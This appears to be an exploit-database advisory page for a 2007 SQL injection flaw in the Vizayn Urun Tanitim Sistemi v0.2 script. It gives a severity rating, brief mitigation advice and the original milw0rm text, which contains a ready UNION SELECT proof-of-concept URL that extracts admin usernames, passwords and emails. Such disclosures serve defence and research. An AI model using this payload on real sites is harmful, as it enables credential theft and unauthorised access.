header-logo
Suggest Exploit
vendor:
Vizayn Urun Tanitim Sistemi
by:
ertuqrul
7.5
CVSS
HIGH
Remote SQL Injection
CWE
Product Name: Vizayn Urun Tanitim Sistemi
Affected Version From: v0.2
Affected Version To: v0.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Vizayn Urun Tanitim Sistemi v0.2 (tr) Remote SQL Injection Vulnerability

This vulnerability allows an attacker to perform a remote SQL injection attack on the Vizayn Urun Tanitim Sistemi v0.2 (tr) script. By manipulating the 'id' parameter in the 'default.asp' file, an attacker can retrieve sensitive information from the admin table, including the admin username, password, and email address.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, users are advised to implement input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

/* Vizayn Urun Tanitim Sistemi v0.2 (tr) Remote SQL Injection Vulnerability
Found by : ertuqrul
PoC By : BAHADIR
Contact: bahadir@bsdmail.org
Scripr HomePage: http://www.vizayn.web.tr/ws.asp?ws=102
Script Demo URL: http://ws.vizaynhosting.com/V02/
Price : 55YTL 

PoF Concept:
Http://[HOST]/[PATH]/default.asp?islem=haberdetay&id=-1%20union%20select%20USERNAME,PASSWORD,EMAIL,USERNAME%20from%20ADMIN
Takes admin username ,password and email adress from admin table 

W0rdz:Maksat Birseyler Eklemek Olsun =)
GreetZ Goes To : BURCU (Her Ne Kadar Bilmesede :D ) Ayrica Dostum Erchin'e ( Ercin Kardesim, Warcraftin Amk. Birak Su Malak Oyunu :D )  
and also to Str0ke For Posting :)
*/

# milw0rm.com [2007-05-30]